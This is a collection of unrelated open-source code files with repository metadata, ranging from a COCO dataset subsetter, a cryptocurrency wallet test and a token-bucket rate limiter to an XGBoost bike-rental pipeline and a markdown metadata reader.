5e0b5df51b89d01cfc68c8ef29bbf769d157dd0d | 2,245 | py | Python | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | import threading
import time
import sys
sys.path.append("..") #TODO figure out wtf is wrong with python imports
from code_base.const import Const
class Stats:
'''
This class is used to keep track of the number of packet-in messages per delta_t
'''
def __init__(self, hard_timeout, idle_timeout, delta_t=60):
self.hard_timeout = hard_timeout
self.idle_timeout = idle_timeout
self.data = {}
self.data_lock = threading.Lock()
self.time = time.time()
self.count = 0
self.delta_t = delta_t
self.From = 0
self.To = delta_t
self.res_path = Const.BASE_PATH+"/Endpoint_TP/benchmarking_res/packet-in_report_"+str(Const.endpointTPPort)+"_HARD_TIMEOUT_"+str(self.hard_timeout)+"_IDLE_TIMEOUT_"+str(self.idle_timeout)+".bench"
with open(self.res_path, 'w+') as f:
f.write("")
self.write("second,No_of_Packets\n")
#self.write("-------------------\n")
self.daemon = threading.Thread(target=self.write_result)
self.daemon.daemon = True
self.daemon.start()
def tick(self):
'''
        Is invoked whenever the event we want to observe occurs
'''
while time.time()-self.time > self.delta_t:
#self.write(str(self.From)+"s "+str(self.To)+"s "+str(self.count)+"\n")
self.data_lock.acquire()
self.data[str(self.From)] = self.count
self.data_lock.release()
self.count = 0
self.From = self.To
self.To = self.To+self.delta_t
self.time = self.time+self.delta_t
self.count += 1
def write(self, msg):
'''
        Append msg to the results file at self.res_path
'''
with open(self.res_path, 'a') as f:
f.write(str(msg))
def write_result(self):
while True:
with open(self.res_path, 'a') as f:
self.data_lock.acquire()
local_data = self.data
self.data = {}
self.data_lock.release()
for key, value in local_data.items():
f.write(str(key)+','+str(value)+'\n')
time.sleep(11*60)
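# Illustrative usage (timeout values are hypothetical):
#
#     stats = Stats(hard_timeout=30, idle_timeout=10, delta_t=60)
#     stats.tick()  # call once per observed packet-in event
#     # the background daemon periodically flushes per-interval counts
#     # to the .bench CSV at stats.res_path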
| 35.634921 | 204 | 0.560802 |
c81b0463fd48b72ebae24c1ee773be356b8c019c | 1,203 | py | Python | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | import sys
from Naked.toolshed.shell import execute_js
import pandas as pd
import numpy as np
import s_command as sc
import p_command as pc
class server():
def __init__(self, coin, par, ex):
self.coin = coin
self.par = par
self.ex = ex
def run(self):
scom = sc.s_command(self.coin)
pcom = pc.p_command(self.coin)
# Wait for the command input from bot.js
command = raw_input()
if command[0] == 's':
# Get the latest DataFrame from the CSV
self.par = (60 if (int(self.par) > 61 or int(self.par) == -1) else self.par)
s = scom.writeToFile(self.par,self.ex)
# Writing to stdout gives the answer to bot.js
print s
elif command[0] == 'p':
# I need to rename writeToFile to something like 'on_demand'
s = pcom.spikeCheck()
# Writing to stdout gives the answer to bot.js
print s
elif command[0] == 'x':
            # Just in case -- interrupt the main thread to shut down
            import thread  # py2 stdlib module; this import was missing, making interrupt_main() a NameError
            thread.interrupt_main()
def main():
s = server(str(sys.argv[1]).upper(), sys.argv[2], sys.argv[3])
s.run()
if __name__ == "__main__":
main()
| 21.482143 | 88 | 0.56276 |
b0059397dfc4c469f960d7334eb639af26280fba | 6,845 | py | Python | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | null | null | null | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | 2 | 2019-11-19T01:35:14.000Z | 2019-11-19T01:37:20.000Z | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import shutil
from pycocotools.coco import COCO
import matplotlib.pyplot as plt
from pathlib import Path
import json
class COCOSubsetter(object):
"""
Tools for subsetting COCO data. Can be used to create a smaller subset of
    data either randomly, or by using it in conjunction with pycocotools
to subset by category. Can also be used to duplicate a dataset. For example,
if the user wants to train on a single image for testing, that image can be
duplicated multiple times.
"""
def __init__(self, data_dir):
"""
Parameters
----------
data_dir : str
            Filepath location of COCO data. Expects to find
subdirectories for train2017 and annotations
"""
self.data_dir = Path(data_dir)
self.instance_file = self.data_dir.joinpath('annotations/instances_train2017.json')
self.train_dir = self.data_dir.joinpath('train2017')
self.images = list(self.train_dir.glob('*.jpg'))
self.images = {int(os.path.splitext(os.path.basename(i.as_posix()))[0]): \
i for i in self.images}
self.load_annotations()
return
def random_subset(self, count):
"""
Parameters
----------
count : int
the number of random images to select
Returns
-------
dict
dictionary of {image_id: Path(image)}
"""
        images = np.random.choice(list(self.images.keys()), size=count, replace=False)
        return {i: self.images[i] for i in images}
def load_annotations(self):
"""
Load annotations for COCO data
Returns
-------
"""
with open(self.instance_file) as infile:
self.instances = json.load(infile)
def _create_new_annotations(self, annotations, images):
"""
Used for generating a new set of annotations
info licenses and categories are the same for
the subset, so just copy them. For annotations
and images, take a new set to combine.
Parameters
----------
annotations : list[dict]
a list of dictionaries of annotations
images : list[dict]
a list of dictionaries of image information
Returns
-------
dict
A dictionary mirroring the annotations format
"""
new_annotations = dict()
new_annotations['info'] = self.instances['info']
new_annotations['licenses'] = self.instances['licenses']
new_annotations['categories'] = self.instances['categories']
new_annotations['annotations'] = annotations
new_annotations['images'] = images
return new_annotations
def filter_annotations(self, images):
"""
Given a set of image ids, subset the annotations and images
and combine with other fields of the annotations file
Parameters
----------
images : list[int]
a list of image ids
Returns
-------
dict
A dictionary of new annotations
"""
annotations = [i for i in self.instances['annotations'] if i['image_id'] in images]
images = [i for i in self.instances['images'] if i['id'] in images]
return self._create_new_annotations(annotations, images)
def duplicate_annotations(self, count):
"""
Create duplicates of the annotations by incrementing ids and filenames.
Given a count, apply the range of (0,count) to the end of the image ids
and filenames.
Parameters
----------
count : int
The number of time to duplicate the annotations
Returns
-------
dict
A dictionary of new annotations
"""
new_annotations = []
new_images = []
for num in range(count):
for anno in self.instances['annotations']:
anno_copy = anno.copy()
anno_copy['image_id'] = int("{}{}".format(anno['image_id'], str(num)))
new_annotations.append(anno_copy)
for image in self.instances['images']:
image_copy = image.copy()
filename = os.path.splitext(image_copy['file_name'])
image_copy['file_name'] = "{}{}{}".format(filename[0],
str(num),
filename[1])
new_images.append(image_copy)
return self._create_new_annotations(new_annotations, new_images)
def create_subset_dir(self, dir):
"""
Checks if the output directory exists and creates it if it doesn't
Parameters
----------
dir : str
filepath for output
Returns
-------
None
Raises
------
AssertionError
If directory already exists, return error
"""
assert not dir.exists(), "directory {} exists".format(dir.as_posix())
dir.mkdir()
dir.joinpath('annotations').mkdir()
dir.joinpath('train2017').mkdir()
def create_subset(self, images, dir):
"""
Create a new dataset based on a list of images
Parameters
----------
images : list[int]
A list of image ids
dir : str
path for output
Returns
-------
None
"""
dir = Path(dir)
self.create_subset_dir(dir)
for image in images:
shutil.copy(self.images[image],
dir.joinpath('train2017').joinpath(os.path.basename(self.images[image])))
with open(dir.joinpath('annotations').joinpath('instances_train2017.json'), 'w') as anno_file:
anno_file.write(json.dumps(self.filter_annotations(images)))
def duplicate_dataset(self, count, dir):
"""
Create a new dataset with duplicated images
Parameters
----------
count : int
Number of duplicates to generate
dir : str
output directory
Returns
-------
None
"""
dir = Path(dir)
self.create_subset_dir(dir)
new_annotations = self.duplicate_annotations(count)
for image in self.images.values():
basename, _ = os.path.splitext(os.path.basename(image))
for num in range(count):
new_file = basename + str(num) + '.jpg'
shutil.copy(image,
dir.joinpath('train2017').joinpath(new_file))
with open(dir.joinpath('annotations').joinpath('instances_train2017.json'), 'w') as outfile:
outfile.write(json.dumps(new_annotations))
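# Illustrative usage (paths are hypothetical):
#
#     subsetter = COCOSubsetter('/data/coco')
#     picked = subsetter.random_subset(100)            # {image_id: Path}
#     subsetter.create_subset(list(picked.keys()), '/data/coco_subset100')
#     # or duplicate every image 5 times, e.g. for single-image overfit tests:
#     subsetter.duplicate_dataset(5, '/data/coco_x5')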
| 32.595238 | 102 | 0.563477 |
5d8e213b6292be8fd7e6c845f2c1fc281c6261db | 3,943 | py | Python | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | 1 | 2021-10-07T01:18:40.000Z | 2021-10-07T01:18:40.000Z | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | null | null | null | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2018 The Cerebralcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet group functionality."""
from test_framework.test_framework import CerebralcoinTestFramework
from test_framework.messages import CTransaction, FromHex, ToHex
from test_framework.util import (
assert_equal,
)
def assert_approx(v, vexp, vspan=0.00001):
if v < vexp - vspan:
raise AssertionError("%s < [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
if v > vexp + vspan:
raise AssertionError("%s > [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
class WalletGroupTest(CerebralcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [[], [], ['-avoidpartialspends']]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Mine some coins
self.nodes[0].generate(110)
# Get some addresses from the two nodes
addr1 = [self.nodes[1].getnewaddress() for i in range(3)]
addr2 = [self.nodes[2].getnewaddress() for i in range(3)]
addrs = addr1 + addr2
# Send 1 + 0.5 coin to each address
[self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs]
[self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs]
self.nodes[0].generate(1)
self.sync_all()
# For each node, send 0.2 coins back to 0;
# - node[1] should pick one 0.5 UTXO and leave the rest
# - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a
# given address, and leave the rest
txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx1 = self.nodes[1].getrawtransaction(txid1, True)
# txid1 should have 1 input and 2 outputs
assert_equal(1, len(tx1["vin"]))
assert_equal(2, len(tx1["vout"]))
# one output should be 0.2, the other should be ~0.3
v = [vout["value"] for vout in tx1["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 0.3, 0.0001)
txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx2 = self.nodes[2].getrawtransaction(txid2, True)
# txid2 should have 2 inputs and 2 outputs
assert_equal(2, len(tx2["vin"]))
assert_equal(2, len(tx2["vout"]))
# one output should be 0.2, the other should be ~1.3
v = [vout["value"] for vout in tx2["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 1.3, 0.0001)
# Empty out node2's wallet
self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
# Fill node2's wallet with 10000 outputs corresponding to the same
# scriptPubKey
for i in range(5):
raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 0.05}])
tx = FromHex(CTransaction(), raw_tx)
tx.vin = []
tx.vout = [tx.vout[0]] * 2000
funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx))
signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex'])
self.nodes[0].sendrawtransaction(signed_tx['hex'])
self.nodes[0].generate(1)
self.sync_all()
# Check that we can create a transaction that only requires ~100 of our
# utxos, without pulling in all outputs and creating a transaction that
# is way too big.
assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5)
if __name__ == '__main__':
    WalletGroupTest().main()
| 40.649485 | 137 | 0.62313 |
60c6b201c5eb3bed118279ee71078fb25f5a1766 | 1,909 | py | Python | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | """
kombu.utils.limits
==================
Token bucket implementation for rate limiting.
:copyright: (c) 2009 - 2012 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
import time
__all__ = ['TokenBucket']
class TokenBucket(object):
"""Token Bucket Algorithm.
See http://en.wikipedia.org/wiki/Token_Bucket
Most of this code was stolen from an entry in the ASPN Python Cookbook:
http://code.activestate.com/recipes/511490/
.. admonition:: Thread safety
This implementation may not be thread safe.
"""
#: The rate in tokens/second that the bucket will be refilled
fill_rate = None
    #: Maximum number of tokens in the bucket.
capacity = 1
#: Timestamp of the last time a token was taken out of the bucket.
timestamp = None
def __init__(self, fill_rate, capacity=1):
self.capacity = float(capacity)
self._tokens = capacity
self.fill_rate = float(fill_rate)
self.timestamp = time.time()
def can_consume(self, tokens=1):
"""Returns :const:`True` if `tokens` number of tokens can be consumed
from the bucket."""
if tokens <= self._get_tokens():
self._tokens -= tokens
return True
return False
def expected_time(self, tokens=1):
"""Returns the expected time in seconds when a new token should be
available.
.. admonition:: Warning
This consumes a token from the bucket.
"""
_tokens = self._get_tokens()
tokens = max(tokens, _tokens)
return (tokens - _tokens) / self.fill_rate
def _get_tokens(self):
if self._tokens < self.capacity:
now = time.time()
delta = self.fill_rate * (now - self.timestamp)
self._tokens = min(self.capacity, self._tokens + delta)
self.timestamp = now
return self._tokens
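# Illustrative usage (rates are arbitrary):
#
#     bucket = TokenBucket(fill_rate=10, capacity=10)  # refills 10 tokens/sec
#     if bucket.can_consume(1):
#         pass  # perform the rate-limited operation
#     else:
#         time.sleep(bucket.expected_time(1))  # wait until a token is expected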
| 26.513889 | 77 | 0.623363 |
dd73b9f045aae924fe65d7ae910ad63d90d65fae | 1,938 | py | Python | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | 6 | 2019-07-14T06:13:12.000Z | 2022-03-01T08:42:17.000Z | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | null | null | null | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | 1 | 2022-03-07T17:10:40.000Z | 2022-03-07T17:10:40.000Z | # coding: utf-8
def cos(vector1,vector2):
dot_product = 0.0
normA = 0.0
normB = 0.0
for a,b in zip(vector1,vector2):
dot_product += a*b
normA += a**2
normB += b**2
if normA == 0.0 or normB==0.0:
return None
else:
print normA
return dot_product / ((normA*normB)**0.5)
def cosNumpy(A,B):
import numpy as np
    A = np.array(A, dtype='float32')
    B = np.array(B, dtype='float32')
    num = A.dot(B.T)
    denom = np.linalg.norm(A) * np.linalg.norm(B)
    print np.linalg.norm(A)
    return num / denom
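# Quick sanity checks (note: cos/cosNumpy also print a norm for debugging):
#   cosNumpy([1, 0], [0, 1]) -> 0.0  (orthogonal vectors)
#   cosNumpy([1, 2], [1, 2]) -> 1.0  (identical vectors)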
def loadSys(path,repath):
import codecs
re =codecs.open(repath,'w',encoding='utf-8')
with codecs.open(path,'r',encoding='utf-8')as f:
for line in f:
arr =line.strip().split(' ')
w =arr[0].split(',')
for ww in w:
if ww==u'对':
re.write(line)
elif ww==u'对于':
re.write(line)
re.close()
def loadDict(path):
import codecs
f =codecs.open(path,'r','utf-8')
words ={}
embeddings =[]
n=0
for line in f:
n+=1
arrays =line.strip().split(' ')
for w in arrays[1:]:
embeddings.append(float(w))
embeddings =np.asarray(embeddings,dtype='float32')
if not words.has_key(arrays[0]):
words[arrays[0]]=embeddings
else:
print arrays[0]
embeddings=[]
f.close()
print len(words)
print n
return words
if __name__=='__main__':
import numpy as np
from Spearman import calcutaWord
# A =np.loadtxt('vec.txt',delimiter=' ',dtype='float32')
#
# print cos(A,A)
#
# print cosNumpy(A,A)
embeddings =loadDict('dicts.txt')
calcutaWord('11',embeddings)
# path =['vectors/sysnet.txt','dicts.txt']
# loadSys(path[0],path[1]) | 26.189189 | 61 | 0.518576 |
4a643a041ce244556ee986e257b9de4a559c5863 | 4,998 | py | Python | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | 2 | 2020-01-19T18:11:05.000Z | 2020-01-19T18:12:07.000Z | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | 1 | 2020-01-15T01:57:04.000Z | 2020-01-15T01:57:04.000Z | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | null | null | null | #@+leo-ver=5-thin
#@+node:ekr.20170428084207.311: * @file ../external/npyscreen/fm_form_edit_loop.py
#!/usr/bin/env python
# encoding: utf-8
import leo.core.leoGlobals as g
assert g
#@+others
#@+node:ekr.20170428084207.312: ** Declarations
"""
form_edit_loop.py
Created by Nicholas Cole on 2008-03-31.
Copyright (c) 2008 __MyCompanyName__. All rights reserved.
"""
# import sys
# import os
import weakref
#@+node:ekr.20170428084207.313: ** class FormNewEditLoop
class FormNewEditLoop:
"Edit Fields .editing = False"
#@+others
#@+node:ekr.20170428084207.314: *3* pre_edit_loop
def pre_edit_loop(self):
pass
#@+node:ekr.20170428084207.315: *3* post_edit_loop
def post_edit_loop(self):
pass
#@+node:ekr.20170428084207.316: *3* _during_edit_loop
def _during_edit_loop(self):
pass
#@+node:ekr.20170428084207.317: *3* FormNewEditLoop.edit_loop
def edit_loop(self):
# g.trace('===== (FormNewEditLoop)')
self.editing = True
self.display()
while not (self._widgets__[self.editw].editable and not self._widgets__[self.editw].hidden):
self.editw += 1
if self.editw > len(self._widgets__)-1:
self.editing = False
return False
while self.editing:
if not self.ALL_SHOWN: self.on_screen()
self.while_editing(weakref.proxy(self._widgets__[self.editw]))
self._during_edit_loop()
if not self.editing:
break
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
self.handle_exiting_widgets(self._widgets__[self.editw].how_exited)
if self.editw > len(self._widgets__)-1: self.editw = len(self._widgets__)-1
#@+node:ekr.20170428084207.318: *3* FormNewEditLoop.edit
def edit(self):
# g.trace('===== (FormNewEditLoop)')
self.pre_edit_loop()
self.edit_loop()
self.post_edit_loop()
#@-others
#@+node:ekr.20170428084207.319: ** class FormDefaultEditLoop
class FormDefaultEditLoop:
#@+others
#@+node:ekr.20170428084207.320: *3* FormDefaultEditLoop.edit (fm_form_edit_loop.py)
def edit(self):
"""
Edit the fields until the user selects the ok button added in the lower
right corner. Button will be removed when editing finishes
"""
# g.trace('===== (FormDefaultEditLoop:%s)' % self.__class__.__name__)
# Add ok button. Will remove later
tmp_rely, tmp_relx = self.nextrely, self.nextrelx
my, mx = self.curses_pad.getmaxyx()
ok_button_text = self.__class__.OK_BUTTON_TEXT
my -= self.__class__.OK_BUTTON_BR_OFFSET[0]
mx -= len(ok_button_text)+self.__class__.OK_BUTTON_BR_OFFSET[1]
self.ok_button = self.add_widget(self.__class__.OKBUTTON_TYPE, name=ok_button_text, rely=my, relx=mx, use_max_space=True)
ok_button_postion = len(self._widgets__)-1
self.ok_button.update()
# End add buttons
self.editing=True
if self.editw < 0: self.editw=0
if self.editw > len(self._widgets__)-1:
self.editw = len(self._widgets__)-1
if not self.preserve_selected_widget:
self.editw = 0
if not self._widgets__[self.editw].editable: self.find_next_editable()
self.display()
while not (self._widgets__[self.editw].editable and not self._widgets__[self.editw].hidden):
self.editw += 1
if self.editw > len(self._widgets__)-1:
self.editing = False
return False
while self.editing:
if not self.ALL_SHOWN: self.on_screen()
self.while_editing(weakref.proxy(self._widgets__[self.editw]))
if not self.editing:
break
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
self.handle_exiting_widgets(self._widgets__[self.editw].how_exited)
if self.editw > len(self._widgets__)-1:
self.editw = len(self._widgets__)-1
if self.ok_button.value:
self.editing = False
self.ok_button.destroy()
del self._widgets__[ok_button_postion]
del self.ok_button
self.nextrely, self.nextrelx = tmp_rely, tmp_relx
self.display()
#try:
# self.parentApp._FORM_VISIT_LIST.pop()
#except:
# pass
self.editing = False
self.erase()
#@+node:ekr.20170428084207.321: *3* move_ok_button
def move_ok_button(self):
if hasattr(self, 'ok_button'):
my, mx = self.curses_pad.getmaxyx()
my -= self.__class__.OK_BUTTON_BR_OFFSET[0]
mx -= len(self.__class__.OK_BUTTON_TEXT)+self.__class__.OK_BUTTON_BR_OFFSET[1]
self.ok_button.relx = mx
self.ok_button.rely = my
#@-others
#@-others
#@@language python
#@@tabwidth -4
#@-leo
| 34 | 129 | 0.626251 |
8ee4171a115907fe52a4f699534e31976f816706 | 2,037 | py | Python | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | import typing as t
from sklearn.base import BaseEstimator
from sklearn.base import TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
import xgboost as xgb
class BikeRentalFeatureSelection(BaseEstimator, TransformerMixin):
def __init__(self, feature_columns):
self.feature_columns = feature_columns
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.feature_columns]
class BikeColumnTransformer(BaseEstimator, TransformerMixin):
"""Bike column transformer that processes categorical features
    for use with the XGBoost regressor.
Since we are working only with tree algorithms, we do not do preprocessing on the
continuous variables.
"""
def __init__(self, categorical_features):
self.categorical_features = categorical_features
self._column_transformer = ColumnTransformer(
transformers=[
(
"onehot",
OneHotEncoder(handle_unknown="ignore"),
self.categorical_features,
),
],
remainder="passthrough",
sparse_threshold=0,
)
def fit(self, X, y=None):
self._column_transformer = self._column_transformer.fit(X, y=y)
return self
def transform(self, X):
X_ = self._column_transformer.transform(X)
return X_
def build_estimator(hyperparams: t.Dict[str, t.Any]):
estimator_mapping = get_estimator_mapping()
steps = []
for name, params in hyperparams.items():
estimator = estimator_mapping[name](**params)
steps.append((name, estimator))
model = Pipeline(steps)
return model
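# Illustrative hyperparams layout (column names and values are hypothetical;
# keys must match the step names in get_estimator_mapping, in pipeline order):
#
#     hyperparams = {
#         "selector": {"feature_columns": ["season", "temp", "hum"]},
#         "column_transformer": {"categorical_features": ["season"]},
#         "regressor": {"n_estimators": 200, "max_depth": 6},
#     }
#     model = build_estimator(hyperparams)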
def get_estimator_mapping():
return {
"selector": BikeRentalFeatureSelection,
"column_transformer": BikeColumnTransformer,
"regressor": xgb.XGBRegressor,
} | 29.955882 | 85 | 0.677958 |
87069d82fac43c28809b3f5e892175f4e4461183 | 612 | py | Python | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | 1 | 2020-06-26T09:36:03.000Z | 2020-06-26T09:36:03.000Z | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | null | null | null | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | 5 | 2020-06-26T09:35:10.000Z | 2021-12-10T08:53:21.000Z | EVENT_TICK = "E_TICK|"
EVENT_TICKS_CHANGED = "E_TICKS_CHANGED|"
EVENT_TICKS = "E_TICKS|"
EVENT_TRADE = "E_TRADE|"
EVENT_TRADES = "E_TRADES|"
EVENT_ORDER = "E_ORDER|"
EVENT_ORDERS = "E_ORDERS|"
EVENT_POSITION = "E_POSITION|"
EVENT_POSITIONS = "E_POSITIONS|"
EVENT_ACCOUNT = "E_ACCOUNT|"
EVENT_ACCOUNTS = "E_ACCOUNTS|"
EVENT_CONTRACT = "E_CONTRACT|"
EVENT_CONTRACTS = "E_CONTRACTS|"
EVENT_ERROR = "E_ERROR|"
EVENT_ERRORS = "E_ERRORS|"
EVENT_GATEWAY = "E_GATEWAY|"
EVENT_GATEWAYS = "E_GATEWAYS|"
EVENT_LOG = "E_LOG|"
EVENT_LOGS = "E_LOGS|"
EVENT_THREAD_STOP = "E_THREAD_STOP|" | 30.6 | 42 | 0.70915 |
cd100af10f9bb4cbbac9edd6151bc2bc84a7c5cf | 3,879 | py | Python | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 1 | 2020-12-20T23:16:36.000Z | 2020-12-20T23:16:36.000Z | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 2 | 2020-08-14T09:48:25.000Z | 2020-08-14T09:55:21.000Z | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 1 | 2020-12-20T23:16:49.000Z | 2020-12-20T23:16:49.000Z | #!/usr/bin/env python
# coding: utf-8
import os
import yaml
import time
import re
import git
## load serial data
def get_meta_tree(sourcefile, source_directory_realpath, meta):
## collect meta
# get metadata from file meta.yaml in every directory in sourcepath
stepsourcedir = ''
for index, directory in enumerate(os.path.dirname(sourcefile).split(os.sep)):
stepsourcedir += directory + os.sep
        ## only look for meta.yaml at or below source_directory, never above it
if os.path.commonprefix((stepsourcedir, source_directory_realpath)) == source_directory_realpath:
## define meta file
# [Please use ".yaml" when possible.](https://yaml.org/faq.html)
meta_directory_file = stepsourcedir + 'meta.yaml'
# Check if the metafile exists
if (os.path.isfile(meta_directory_file)):
with open(meta_directory_file, 'r') as openmeta_directory_file:
meta_directory = openmeta_directory_file.read()
meta.update(yaml.load(meta_directory, Loader=yaml.FullLoader))
return meta
def get_meta_file(sourcefile, proserial, meta):
## check if source file includes metadata
try:
proserial_meta = yaml.load(proserial[1], Loader=yaml.FullLoader)
meta.update(proserial_meta)
return meta
    ## the sourcefile meta block is not valid yaml,
    ## or
    ## the sourcefile has no meta block at all;
    ## either case is PROSErial-conformant
    ## TODO: warn the user
except:
return meta
def get_html_title_from_first_heading(proserial, meta):
# Define [HTML Title element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/title) ```<title>```
# from first markdown heading as ```pagetitle```
# if it is missing in meta
if 'pagetitle' not in meta:
firsthead = re.search('(?m)^#+(.*)', proserial[0])
        if firsthead is not None:
meta['pagetitle'] = firsthead.group(1).strip()
return meta
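# e.g. a source starting with '# Getting Started' (and no pagetitle in meta)
# yields meta['pagetitle'] == 'Getting Started'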
def get_slugs(sourcefile, source_directory_realpath, config_namespaceseparator):
## create target file slugs
lemma, file_extension = os.path.splitext(os.path.basename(sourcefile) )
## make a source directory relative path
contentdir = os.path.dirname(sourcefile[len(source_directory_realpath) +1 :]) ## + 1 to remove leading slash
    # use source directories as __namespace__, with a customizable namespaceseparator (```namespace:pagetitle```).
slugdir = contentdir.replace(os.sep, config_namespaceseparator)
    ## slugs with directories need a trailing namespaceseparator
if (len(contentdir ) > 0):
slugdir = slugdir + config_namespaceseparator
slugs = {}
slugs['lemma'] = lemma
slugs['dirlimb'] = slugdir + lemma
slugs['html'] = slugdir + lemma + '.html'
slugs['json'] = slugdir + lemma + '.json'
source_directory_realpath_len = len(source_directory_realpath)
slugs['source'] = sourcefile[source_directory_realpath_len:]
return slugs
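# Illustrative output (a sketch with hypothetical paths): for
# sourcefile='/src/dir/page.md', source_directory_realpath='/src' and
# config_namespaceseparator=':', get_slugs returns lemma='page',
# dirlimb='dir:page', html='dir:page.html', json='dir:page.json'
# and source='/dir/page.md'.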
def get_source_git_meta(sourcefile, config_source, source_git_meta_meta):
try:
repo = git.Repo(config_source, search_parent_directories=True)
# https://git-scm.com/docs/pretty-formats
source_git_meta = {}
source_git_meta['last_name'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_name_format'], sourcefile)
source_git_meta['last_email'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_email_format'], sourcefile)
source_git_meta['last_date'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_date_format'], sourcefile)
source_git_meta['last_subject'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_subject_format'], sourcefile)
# TODO oldest_*
return source_git_meta
except:
return
| 34.633929 | 133 | 0.66744 |
